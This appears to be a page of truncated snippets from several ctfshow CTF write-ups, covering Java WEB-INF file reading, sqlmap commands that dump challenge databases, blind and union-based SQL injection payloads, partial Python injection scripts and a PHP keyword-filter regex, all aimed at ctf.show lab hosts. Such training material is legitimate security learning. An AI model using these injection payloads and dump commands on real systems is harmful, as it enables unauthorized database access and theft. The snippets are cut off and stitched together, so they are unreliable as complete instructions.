查看源代码,发现文件指针 并且可以读取文件 去读WEB-INF/web.xml,发现存在con.ctfshow.servlet.GetFlag 读取WEB-INF/classes/com/ctfshow/servlet/GetFlag.class,因为是class文件字符有点乱,发现fl3g web300-文件读取 和上题一样 找到的flag叫f1bg 补充:以上题目中缺少三个struts2漏洞 因为是第一次了解关于Java漏...
id=1 --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" --dump web202 也是sqlmap的使用 $ sqlmap -u "http://5d506c45-1336-4345-858f-1de6dacef1a1.challenge.ctf.show:8080/api/" --data="id=1" --level=3 --risk=3 $ sqlmap -u "http://5d506c45-1336-4345-858f-1de6d...
web188有过滤的数字型注入//查询语句 //拼接sql语句查找指定ID用户 $sql = "select pass from ctfshow_user where username = {$username}"; //返回逻辑 //用户名检测 if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){ $ret['msg']='...
web24是rand(0,300)和sleep(3),修改一下参数就能跑 # coding: utf-8 # Auth: y2hlbmc import requests import time import threading url = "http://7dbded2a-12d4-4d3a-a8c5-ddc6d8e78d74.challenge.ctf.show/" def Thread(fun,*args): return threading.Thread(target=fun, args=args) def ...
web201sqlmap 工具使用练习。 题目提示 --user-agent 指定 user-agent,实际上不是 sqlmap 的 ua 还不让访问,测试 ua sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org) 可用。 题目还指定使用 --referer 绕过 referer 检查,带着 sqlmap 的 ua 访问会提示“打击盗版人人有责,你都不是从ctf.show来的”,故指定 ...
web签到<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-11-10 17:20:38 # @Last Modified by: h1xa # @Last Modified time: 2022-11-11 09:38:59 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__); ...
web 189首先找到flag的位置,接着再对flag进行盲注,这个题,是在web 188的基础上进行的修改import requests url = "http://8cccbace-cc29-4542-a78d-b0f3261ed4f5.challenge.ctf.show:8080/api/" def getflagPosition():#返回flag的位置 head=1 tail=300 while head<tail: mid=(head+tail)>>1 data={...
【ctfshow】web入门之sql注入(长期更新) 171 查询语句 1 2 //拼接sql语句查找指定ID用户 $sql ="select username,password from user where username !='flag' and id = '".$_GET['id']."'limit 1;"; 可以看出当前表名 user,表下有字段 username和id。
web175 解法一 解法二 web176 解法一 解法二 web177 web 178 解法一 解法二 web179 ...
web171 首先尝试1'--+,发现有返回值;说明直接闭合正确; 接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来) 查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web 爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_sche...